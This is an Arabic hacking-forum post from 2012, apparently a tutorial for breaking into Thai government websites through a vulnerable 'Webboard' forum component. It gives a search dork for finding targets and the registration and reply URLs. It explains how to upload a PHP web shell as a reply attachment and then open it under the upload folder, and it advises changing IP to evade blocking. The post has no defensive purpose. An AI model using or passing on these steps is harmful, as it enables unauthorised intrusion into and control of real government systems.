السلام عليكم ورحمة الله وبركاته.
ثغرة خطيرة مصابة بها مواقع حكومية كثيرة تمكننا من رفع الشيل
Dork:
كود:
site:go.th inurl:name=member+file=index
رابط التسجيل
كود:
http://www.xxxxx.go.th/index.php?name=member&file=index
http://www.xxxxx.go.th/?name=member&file=index
بعد ذلك نعود الى الصفحة الرئيسية للمنتدى:
كود:
http://www.xxxxx.go.th/index.php?name=webboard
http://www.xxxxx.go.th/?name=webboard
نختار أحد المواضيع لنضيف الرد:
كود:
http://www.xxxxx.go.th/index.php?name=webboard&file=read&id=49
http://www.xxxxx.go.th/?name=webboard&file=read&id=49
أثناء كتابة الرد يمكننا إرفاق الشيل كما في الصورة:
--------------------------------------------------------------------------
بعد ذلك نعود إلى الموضوع لنشاهد الرد ونتحصل على رابط الشيل كما في الصورة:
والرابط يكون مثل هذا:
كود:
http://www.xxxxx.go.th/webboard_upload/1340890810_madspot.php
مبروك !
ملاحظة: يجب تغيير الأيبي لأن الكثير من المواقع الحكومية محضورة في بعض البلدان العربية
بالتوفيق
eyvm o'dvm ghojvhr hgl,hru hgp;,ldm (Webboard)
07-06-2012, 02:53 PM
ثغرة خطيرة لاختراق المواقع الحكومية (Webboard) 
العرض العادي
